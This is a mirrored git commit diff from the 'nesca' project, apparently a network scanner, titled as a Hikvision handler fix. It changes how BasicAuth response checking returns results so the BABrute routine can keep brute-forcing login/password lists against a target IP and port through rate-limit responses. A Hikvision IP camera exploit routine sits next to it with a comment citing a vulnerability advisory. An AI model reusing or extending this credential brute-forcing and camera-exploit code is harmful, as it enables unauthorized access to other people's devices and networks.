mirror of
https://github.com/ChronosX88/nesca.git
synced 2024-11-23 18:52:19 +00:00
Hikvision handler fix.
This commit is contained in:
parent
5789c1d4db
commit
40c380197e
@ -1,7 +1,7 @@
|
|||||||
#include "BasicAuth.h"
|
#include "BasicAuth.h"
|
||||||
#include "FileUpdater.h"
|
#include "FileUpdater.h"
|
||||||
|
|
||||||
bool BA::checkOutput(const string *buffer, const char *ip, const int port) {
|
int BA::checkOutput(const string *buffer, const char *ip, const int port) {
|
||||||
if((Utils::ustrstr(*buffer, "200 ok") != -1 ||
|
if((Utils::ustrstr(*buffer, "200 ok") != -1 ||
|
||||||
Utils::ustrstr(*buffer, "http/1.0 200") != -1 ||
|
Utils::ustrstr(*buffer, "http/1.0 200") != -1 ||
|
||||||
Utils::ustrstr(*buffer, "http/1.1 200") != -1)
|
Utils::ustrstr(*buffer, "http/1.1 200") != -1)
|
||||||
@ -12,7 +12,7 @@ bool BA::checkOutput(const string *buffer, const char *ip, const int port) {
|
|||||||
&& Utils::ustrstr(*buffer, "íåïðàâèëüíû") == -1
|
&& Utils::ustrstr(*buffer, "íåïðàâèëüíû") == -1
|
||||||
&& Utils::ustrstr(*buffer, "Ð<EFBFBD>еправильны") == -1
|
&& Utils::ustrstr(*buffer, "Ð<EFBFBD>еправильны") == -1
|
||||||
) {
|
) {
|
||||||
return true;
|
return 1;
|
||||||
}
|
}
|
||||||
else if (Utils::ustrstr(*buffer, "503 service unavailable") != -1
|
else if (Utils::ustrstr(*buffer, "503 service unavailable") != -1
|
||||||
|| Utils::ustrstr(*buffer, "http/1.1 503") != -1
|
|| Utils::ustrstr(*buffer, "http/1.1 503") != -1
|
||||||
@ -25,9 +25,10 @@ bool BA::checkOutput(const string *buffer, const char *ip, const int port) {
|
|||||||
stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")");
|
stt->doEmition_BARedData("[.] 503/400/403 - Waiting 30sec (" + QString(ip) + ":" + QString::number(port) + ")");
|
||||||
|
|
||||||
Sleep(30000);
|
Sleep(30000);
|
||||||
|
return -1;
|
||||||
}
|
}
|
||||||
|
|
||||||
return false;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
//http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities 2
|
//http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities 2
|
||||||
@ -36,9 +37,8 @@ inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode
|
|||||||
|
|
||||||
string buffer;
|
string buffer;
|
||||||
int res = Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
|
int res = Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
|
||||||
if (res == -2) return -1;
|
if (res > 0) {
|
||||||
else if (res != -1) {
|
if (BA::checkOutput(&buffer, ip, port) == 1) return 1;
|
||||||
if (BA::checkOutput(&buffer, ip, port)) return 1;
|
|
||||||
}
|
}
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
@ -69,7 +69,12 @@ lopaStr BA::BABrute(const char *ip, const int port, bool digestMode) {
|
|||||||
res = Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
|
res = Connector::nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
|
||||||
if (res == -2) return lps;
|
if (res == -2) return lps;
|
||||||
else if (res != -1) {
|
else if (res != -1) {
|
||||||
if (checkOutput(&buffer, ip, port)) {
|
res = checkOutput(&buffer, ip, port);
|
||||||
|
if (res == -1) {
|
||||||
|
++i;
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
if (res == 1) {
|
||||||
strcpy(lps.login, loginLst[i]);
|
strcpy(lps.login, loginLst[i]);
|
||||||
strcpy(lps.pass, passLst[j]);
|
strcpy(lps.pass, passLst[j]);
|
||||||
return lps;
|
return lps;
|
||||||
|
@ -11,7 +11,7 @@ private:
|
|||||||
static lopaStr BABrute(const char *ip, const int port, bool digestMode);
|
static lopaStr BABrute(const char *ip, const int port, bool digestMode);
|
||||||
|
|
||||||
public:
|
public:
|
||||||
static bool checkOutput(const string *buffer, const char *ip, const int port);
|
static int checkOutput(const string *buffer, const char *ip, const int port);
|
||||||
static lopaStr BALobby(const char *ip, const int port, bool digestMode);
|
static lopaStr BALobby(const char *ip, const int port, bool digestMode);
|
||||||
};
|
};
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user